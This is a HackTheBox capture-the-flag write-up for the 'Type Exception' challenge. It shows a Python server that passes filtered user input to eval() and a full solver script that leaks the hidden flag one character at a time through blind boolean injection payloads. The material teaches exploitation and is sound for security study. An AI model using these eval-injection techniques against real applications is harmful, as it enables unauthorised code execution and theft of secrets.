Created: Oct 20, 2023

[HackTheBox Write-Up: Type Exception]

Let's start with some context to understand this task and its solution. The task is a Capture The Flag (CTF) challenge, a format commonly used to test information security skills. The primary objective is to extract the "flag," a hidden string.

General Overview of the Task

  • We have server-side Python code that accepts a string from the user.
  • This string is checked against a set of conditions.
  • If the string meets all the conditions, it is passed to the eval() function for execution.
  • We need to extract the hidden "flag" stored in a variable.

Now, let's look at the challenge code in more detail.

import re

with open("./flag.txt") as f:
    FLAG = f.read().strip()  # assumed: this line is truncated in the excerpt

BLACKLIST = '"%&\',-/_:;@\\`{|}~*<=>[] \t\n\r\x0b\x0c'
# Assumed definitions: the excerpt uses these names without showing them
OPEN_LIST = "([{"
CLOSE_LIST = ")]}"

def check_balanced(s):
    stack = []
    for i in s:
        if i in OPEN_LIST:
            stack.append(i)
        elif i in CLOSE_LIST:
            pos = CLOSE_LIST.index(i)
            if ((len(stack) > 0) and
                    (OPEN_LIST[pos] == stack[len(stack)-1])):
                stack.pop()
            else:
                return False
    return len(stack) == 0

def check(s):
    # re.match anchors at the start: input that *begins* with four letters is rejected
    if re.match(r"[a-zA-Z]{4}", s):
        print("You return home.")
    elif len(set(re.findall(r"[\W]", s))) > 4:
        print(set(re.findall(r"[\W]", s)))
        print("A single man cannot bear the weight of all those special characters. You return home.")
    else:
        return all(ord(x) < 0x7f for x in s) and all(x not in s for x in BLACKLIST) and check_balanced(s)

def safe_eval(s, func):
    if not check(s):
        print("\U0001F6B6" + "\U0001F6B6" + "\U0001F6B6")
    else:
        try:
            # Only `type` and `flag` exist inside the eval'd expression
            print(eval(f"{func.__name__}({s})", {"__builtins__": {func.__name__: func}, "flag": FLAG}))
        except Exception:
            print("Error")

if __name__ == "__main__":
    while True:
        inp = input("Input : ")
        safe_eval(inp, type)

First up, the function “check_balanced” verifies that opening and closing brackets are properly paired and nested, returning True or False. Next in line, the function “check” performs a triple-threat analysis on the input string: it rejects any input that begins with four letters (re.match only looks at the start of the string); it counts the distinct non-word characters and rejects the input if there are more than four; and finally, it requires every character to be ASCII and absent from the blacklist, with balanced brackets. Last but not least, the function “safe_eval” is both the gateway for code injection and the last line of defense: only input that passes “check” is evaluated, as type(<input>), with builtins limited to type and the name flag bound to FLAG. It prints the result, or "Error" if evaluation raises an exception, and the main loop then waits for the next input.
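Replaying the filter locally makes it easier to test payloads before sending them. Below is a minimal sketch that mirrors check_balanced and check from the challenge; OPEN_LIST and CLOSE_LIST are not shown in the excerpt, so their values here are an assumption, and passes_filter is a hypothetical helper name.

```python
import re

# Blacklist copied from the challenge code
BLACKLIST = '"%&\',-/_:;@\\`{|}~*<=>[] \t\n\r\x0b\x0c'
# Assumption: the excerpt uses these names without defining them
OPEN_LIST = "([{"
CLOSE_LIST = ")]}"


def check_balanced(s: str) -> bool:
    """Return True if every bracket is closed in the right order."""
    stack = []
    for ch in s:
        if ch in OPEN_LIST:
            stack.append(ch)
        elif ch in CLOSE_LIST:
            pos = CLOSE_LIST.index(ch)
            if stack and stack[-1] == OPEN_LIST[pos]:
                stack.pop()
            else:
                return False
    return not stack


def passes_filter(s: str) -> bool:
    """Hypothetical helper: True if the server would pass `s` to eval()."""
    # re.match anchors at the start: only inputs *beginning* with 4 letters fail
    if re.match(r"[a-zA-Z]{4}", s):
        return False
    # At most 4 distinct non-word characters
    if len(set(re.findall(r"\W", s))) > 4:
        return False
    return (all(ord(c) < 0x7F for c in s)
            and all(c not in s for c in BLACKLIST)
            and check_balanced(s))


for payload in [
    "(1)if(flag.encode().index(0x41)is(0))else(None)",  # accepted
    "flag.encode()",  # rejected: starts with four letters
    "(flag)[0]",      # rejected: square brackets are blacklisted
]:
    print(f"{payload!r}: {passes_filter(payload)}")
```

Note that a payload may contain flag anywhere except at the very start, which is why every injection in this write-up opens with "(1)".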

So, what are our constraints?

  • Symbol Restrictions: We can't use certain symbols, including spaces, commas, colons, quotes, square brackets, and "=". This means standard Python constructs like “if x == y” can't be used directly.
  • Unique Symbol Limit: No more than 4 unique special (non-word) characters are allowed in the string; e.g., the string “((()))” has only two unique symbols: “(” and “)”. Letters and digits don't count toward the limit. This narrows down our choice of operators and functions.
  • Exception Handling: All exceptions are caught by the server and returned as "Error." This means we need to be particularly cautious with code that could throw an exception.
  • Limited eval Context: Only the type function and the flag variable are accessible, meaning functions and classes like list, print, set, str, dir, etc., are not available.
  • Parentheses: They must be paired. “()” is acceptable; “)(“ is not.
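The unique-symbol limit can be checked with the same regular expression the server uses. In this sketch, special_chars and blacklisted are hypothetical helpers; \W matches anything outside [A-Za-z0-9_], which is why letters and digits are free.

```python
import re

BLACKLIST = '"%&\',-/_:;@\\`{|}~*<=>[] \t\n\r\x0b\x0c'


def special_chars(payload: str) -> set[str]:
    """Distinct non-word characters, counted the way check() counts them."""
    return set(re.findall(r"\W", payload))


def blacklisted(payload: str) -> set[str]:
    """Characters in the payload that the blacklist rejects outright."""
    return {c for c in payload if c in BLACKLIST}


print(sorted(special_chars("((()))")))  # ['(', ')']
print(sorted(special_chars("(1)if(flag.encode().count(0x41)is(1))else(None)")))  # ['(', ')', '.']
print(sorted(blacklisted("if x == y")))  # [' ', '=']
```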

And what can we do?

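  • Allowed Symbols: After the blacklist, the only punctuation left is ! # $ ( ) + . ? ^
  • Replace == with is: Since "=" is blacklisted, we can use “is” instead of “==” for comparison. This works for the small integers we compare here because CPython caches integers from -5 to 256, so equal small values are the same object.
  • Use Hexadecimal Numbers: Quotes are blacklisted, so we can't write string literals. Instead, we compare the bytes of flag.encode() against integer literals written in hex, such as 0x41 for 'A'.
  • Class Restriction Workaround: The name list isn't available, but type(flag.split()) returns the list class, which we can then call to build a list.
  • Types as Responses: If the code works, the server prints the type of the result. For example, 1 returns <class 'int'> and None returns <class 'NoneType'>, which gives us a yes/no answer for any condition.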
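Both the allowed-symbol list and the response format can be reproduced locally. This sketch derives the surviving punctuation from the blacklist and then mimics the eval call in safe_eval (without the input filter) against a made-up flag; sandbox and the flag value are assumptions for illustration.

```python
import string
import warnings

BLACKLIST = '"%&\',-/_:;@\\`{|}~*<=>[] \t\n\r\x0b\x0c'

# Punctuation that survives the blacklist
allowed = "".join(c for c in string.punctuation if c not in BLACKLIST)
print(allowed)  # !#$()+.?^

# `x is (0)` makes the compiler emit a SyntaxWarning; silence it for the demo
warnings.filterwarnings("ignore", category=SyntaxWarning)


def sandbox(payload: str, flag: str = "HTB{fake_flag}") -> str:
    """Hypothetical helper: evaluate like safe_eval(payload, type), minus check()."""
    try:
        result = eval(f"type({payload})", {"__builtins__": {"type": type}, "flag": flag})
        return str(result)
    except Exception:
        return "Error"


print(sandbox("1"))             # <class 'int'>
print(sandbox("flag.split()"))  # <class 'list'>: the list class is reachable
print(sandbox("(1)if(flag.encode().index(0x48)is(0))else(None)"))  # <class 'int'>
```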

Let's Get to the Solution

This is not a two-line solution: it uses several loops to extract the flag, and the brute force takes a while to run. You can see the full solution here.

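import socket
import string
import time
from collections import defaultdict
from enum import Enum
from typing import Optional

class Answer(Enum):
    NO = 0
    YES = 1
    ERROR = 2

# Turns a boolean check into an int (yes) / NoneType (no) answer
if_construction = "(1)if({check})else(None)"

def netcat(content: bytes) -> Optional[Answer]:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        # Host left blank as in the original; set it to the challenge instance
        s.connect(("", 1337))
        s.sendall(content + b"\n")
        answer = None
        buffer = b""
        # The server loops forever, so stop as soon as an answer arrives
        while answer is None:
            data = s.recv(1024)
            if len(data) == 0:
                # The server closed the connection
                break
            buffer += data
            if b"<class 'NoneType'>" in buffer:
                answer = Answer.NO
            elif b"<class 'int'>" in buffer:
                answer = Answer.YES
            elif b"Error" in buffer:
                answer = Answer.ERROR
    return answer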

def find_first_index(character: str, occupied: list[int]) -> Optional[int]:
    print("Finding first index: ", end="")
    for index in range(100):
        if index in occupied:
            # A different, already-known character sits here
            continue
        print(".", end="")
        first_index_check = if_construction.format(check=f"flag.encode().index({character})is({index})").encode()
        result = netcat(first_index_check)
        if result == Answer.YES:
            print(f" {index}")
            return index
        if result == Answer.ERROR:
            # bytes.index raised ValueError: the character is not in the flag
            print("Not used")
            return None
    return None

def find_last_index(character: str, start: int, occupied: list[int]) -> Optional[int]:
    print("Finding last index ", end="")
    for index in range(100):
        if index <= start:
            # The last occurrence must come after the first one
            continue
        if index in occupied:
            continue
        print(".", end="")
        last_index_check = if_construction.format(check=f"flag.encode().rindex({character})is({index})").encode()
        result = netcat(last_index_check)
        if result == Answer.YES:
            print(f" {index}")
            return index
    return None

def find_in_between(character: str, first_index: int, last_index: int, count: int, occupied: list[int]) -> list[int]:
    print(f'Searching for {count - 2} indexes between {first_index} and {last_index}: ', end="")
    if (last_index - first_index + 1) == count:
        # every index between the two edge indexes belongs to this character
        found_indexes = list(range(first_index + 1, last_index))
        print(", ".join(map(str, found_indexes)))
        return found_indexes
    # We need a list class to convert a generator to a list
    list_class = "type(flag.split())"
    # "regular" generator that iterates over the flag's bytes
    flag_generator = "((i)for(i)in(flag.encode()))"
    # converting the generator to a list
    flag_list = f"{list_class}({flag_generator})"
    found_indexes = []
    for char_index in range(first_index + 1, last_index):
        if char_index in occupied:
            # this index contains an already-known character
            continue
        if len(found_indexes) + 2 == count:
            # all indexes for this char were found; no need to check the rest
            break
        print(".", end="")
        check_index = if_construction.format(check=f"{flag_list}.pop({char_index})is({character})").encode()
        result = netcat(check_index)
        if result == Answer.YES:
            print(f" {char_index}", end="")
            found_indexes.append(char_index)
    print()
    return found_indexes

def find_count(character):
    print("Finding count ", end="")
    for count in range(1, 20):
        print(".", end="")
        check_count = if_construction.format(check=f"flag.encode().count({character})is({count})").encode()
        result = netcat(check_count)
        if result == Answer.YES:
            print(f" {count}")
            return count
    return None

if __name__ == "__main__":
    start_time = time.time()
    occupied_indexes = []
    found_chars = defaultdict(dict)
    for char_str in string.printable:
        char_hex = hex(ord(char_str))
        print(f"\nChecking <{char_str} {char_hex}>")
        # Where does this character first appear?
        first_index = find_first_index(char_hex, occupied_indexes)
        if first_index is None:
            # This character is not present in the flag
            continue
        found_chars[char_str]["indexes"] = [first_index]
        occupied_indexes.append(first_index)
        # Checking how many duplicates of this character are in the flag
        count = find_count(char_hex)
        found_chars[char_str]["count"] = count
        # If a character occurred more than once, then we can find its index from the end
        if count > 1:
            last_index = find_last_index(char_hex, first_index, occupied_indexes)
            found_chars[char_str]["indexes"].append(last_index)
            occupied_indexes.append(last_index)
            # If the character occurred more than 2 times, then we can find other occurrences between the first and last known index
            if count > 2:
                indexes = find_in_between(char_hex, first_index, last_index, count, occupied_indexes)
                found_chars[char_str]["indexes"] += indexes
                occupied_indexes += indexes
    indexes = []
    # Flatten the dict into (index, char) pairs that can be sorted and joined into the final string
    for char_str, char_data in found_chars.items():
        for index in char_data["indexes"]:
            indexes.append((index, char_str))
    indexes.sort(key=lambda data: data[0])
    flag = "".join(char_str for _, char_str in indexes)
    print(f"\nFlag: {flag}")
    print(f"Finished in {round(time.time() - start_time)} sec.")
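The solver spends almost all of its time in netcat(). To exercise its logic without the remote instance, one option is a local stand-in that runs the same eval the server performs against a made-up flag and maps the printed type to Answer. This is only a sketch: local_netcat and FAKE_FLAG are hypothetical names, and the server's input filter is not replicated.

```python
import warnings
from enum import Enum
from typing import Optional


class Answer(Enum):
    NO = 0
    YES = 1
    ERROR = 2


FAKE_FLAG = "HTB{l0c4l_t3st}"  # hypothetical flag for offline testing

# Payloads use `is` with literals; hide the resulting SyntaxWarning
warnings.filterwarnings("ignore", category=SyntaxWarning)


def local_netcat(content: bytes) -> Optional[Answer]:
    """Same contract as netcat(): take a payload, classify the server's reply."""
    try:
        reply = str(eval(f"type({content.decode()})",
                         {"__builtins__": {"type": type}, "flag": FAKE_FLAG}))
    except Exception:
        reply = "Error"
    if reply == "<class 'NoneType'>":
        return Answer.NO
    if reply == "<class 'int'>":
        return Answer.YES
    if reply == "Error":
        return Answer.ERROR
    return None
```

If the function is pasted into the solver (reusing its own Answer enum), adding netcat = local_netcat at the top of the __main__ block makes every query run against FAKE_FLAG instead of the network, because the helper functions look netcat up by name at call time.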

First Step

We kick off by checking whether the letter 'A' (hex '0x41') is in the flag string and whether its first occurrence is at index 0.

Injection: (1)if(flag.encode().index(0x41)is(0))else(None)  

Readable: 1 if flag.encode().index(0x41) is 0 else None  

Server responses: <class 'int'> means the first 'A' is at index 0; <class 'NoneType'> means it first appears elsewhere; 'Error' means bytes.index raised ValueError, i.e., 'A' is not in the string at all.
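The three possible answers can be reproduced offline. In this sketch, ask is a hypothetical helper that evaluates a payload the way safe_eval does, and the flag HTB{AxAyA} is made up: 'H' (0x48) sits at index 0, 'A' (0x41) first appears at index 4, and 'Z' (0x5a) is absent.

```python
import warnings

warnings.filterwarnings("ignore", category=SyntaxWarning)  # `is` with a literal

FLAG = "HTB{AxAyA}"  # made-up flag for illustration


def ask(payload: str) -> str:
    """Hypothetical helper: evaluate a payload like safe_eval(payload, type)."""
    try:
        return str(eval(f"type({payload})", {"__builtins__": {"type": type}, "flag": FLAG}))
    except Exception:
        return "Error"


def first_index_payload(char_code: int, index: int) -> str:
    """Build the first-step injection for one character code and index."""
    return f"(1)if(flag.encode().index({hex(char_code)})is({index}))else(None)"


print(ask(first_index_payload(0x48, 0)))  # <class 'int'>       'H' first at 0
print(ask(first_index_payload(0x41, 0)))  # <class 'NoneType'>  'A' first elsewhere
print(ask(first_index_payload(0x5A, 0)))  # Error               'Z' not in the flag
```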

Second Step

We count how many times 'A' (hex '0x41') appears in the string.

Injection: (1)if(flag.encode().count(0x41)is(1))else(None)  

Readable: 1 if flag.encode().count(0x41) is 1 else None  

Server responses: <class 'int'> confirms the count; <class 'NoneType'> means we try the next number.
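The counting loop is a plain linear search over candidate counts. This sketch runs it against a made-up flag through a hypothetical ask helper that mimics the server's eval; since the loop starts at 1, an absent character simply yields None.

```python
import warnings
from typing import Optional

warnings.filterwarnings("ignore", category=SyntaxWarning)  # `is` with a literal

FLAG = "HTB{AxAyA}"  # made-up flag for illustration


def ask(payload: str) -> str:
    """Hypothetical helper: evaluate a payload like safe_eval(payload, type)."""
    try:
        return str(eval(f"type({payload})", {"__builtins__": {"type": type}, "flag": FLAG}))
    except Exception:
        return "Error"


def find_count(char_code: int, limit: int = 20) -> Optional[int]:
    """Try count = 1, 2, ... until the server answers with an int."""
    for count in range(1, limit):
        payload = f"(1)if(flag.encode().count({hex(char_code)})is({count}))else(None)"
        if ask(payload) == "<class 'int'>":
            return count
    return None


print(find_count(0x41))  # 3: 'A' occurs three times
print(find_count(0x48))  # 1
```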

Third Step

Once the first index and count are known, we look for the last index of each character that appears more than once.

Injection: (1)if(flag.encode().rindex(0x41)is(0))else(None)  

Readable: 1 if flag.encode().rindex(0x41) is 0 else None  

Note: Upon reflection, this step may be redundant: once the first index and count are known, the positional check from the fourth step could locate the remaining occurrences on its own.
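A local run shows what the last-index query returns for a character that appears three times. As in the solver, the scan skips every index up to the known first occurrence; ask is a hypothetical helper that mimics the server's eval, and the flag is made up.

```python
import warnings
from typing import Optional

warnings.filterwarnings("ignore", category=SyntaxWarning)  # `is` with a literal

FLAG = "HTB{AxAyA}"  # made-up flag: 'A' at indexes 4, 6, 8


def ask(payload: str) -> str:
    """Hypothetical helper: evaluate a payload like safe_eval(payload, type)."""
    try:
        return str(eval(f"type({payload})", {"__builtins__": {"type": type}, "flag": FLAG}))
    except Exception:
        return "Error"


def find_last_index(char_code: int, first_index: int, limit: int = 100) -> Optional[int]:
    """Scan indexes after first_index until rindex() matches."""
    for index in range(first_index + 1, limit):
        payload = f"(1)if(flag.encode().rindex({hex(char_code)})is({index}))else(None)"
        if ask(payload) == "<class 'int'>":
            return index
    return None


print(find_last_index(0x41, 4))  # 8
```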

Fourth Step

We brute-force the remaining positions of characters that appear more than twice.

Injection: (1)if(type(flag.split())(((i)for(i)in(flag.encode()))).pop(1)is(0x41))else(None)  

Readable: 1 if type(flag.split())(i for i in flag.encode()).pop(1) is 0x41 else None  

How it works:

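  1. type(flag.split()) returns the list class, since the name list isn't available in the eval context.
  2. ((i)for(i)in(flag.encode())) is a generator over the flag's bytes; calling the list class on it produces a list of integers.
  3. .pop({char_index})is({character}) removes and returns the element at that index and compares it with the candidate character code. We need pop() because square brackets, and therefore flag[i], are blacklisted.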

This way, we can brute-force the remaining unknown indices and uncover the flag one index at a time.
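The positional check can also be tried offline. This sketch mimics the server's eval with a hypothetical ask helper and a made-up flag, then scans the gap between the first and last 'A' much as find_in_between does. In plain Python the condition is simply list(flag.encode())[i] == 0x41; the payload spells it with pop() because square brackets are blacklisted.

```python
import warnings

warnings.filterwarnings("ignore", category=SyntaxWarning)  # `is` with a literal

FLAG = "HTB{AxAyA}"  # made-up flag: 'A' at indexes 4, 6, 8
FLAG_LIST = "type(flag.split())(((i)for(i)in(flag.encode())))"  # list of byte values


def ask(payload: str) -> str:
    """Hypothetical helper: evaluate a payload like safe_eval(payload, type)."""
    try:
        return str(eval(f"type({payload})", {"__builtins__": {"type": type}, "flag": FLAG}))
    except Exception:
        return "Error"


def byte_at_is(index: int, char_code: int) -> bool:
    """True if the flag byte at `index` equals `char_code`."""
    payload = f"(1)if({FLAG_LIST}.pop({index})is({hex(char_code)}))else(None)"
    return ask(payload) == "<class 'int'>"


def find_in_between(char_code: int, first: int, last: int, count: int) -> list[int]:
    """Check each index strictly between the known edges."""
    found = []
    for index in range(first + 1, last):
        if len(found) + 2 == count:  # every occurrence is accounted for
            break
        if byte_at_is(index, char_code):
            found.append(index)
    return found


print(byte_at_is(4, 0x41))             # True
print(find_in_between(0x41, 4, 8, 3))  # [6]
```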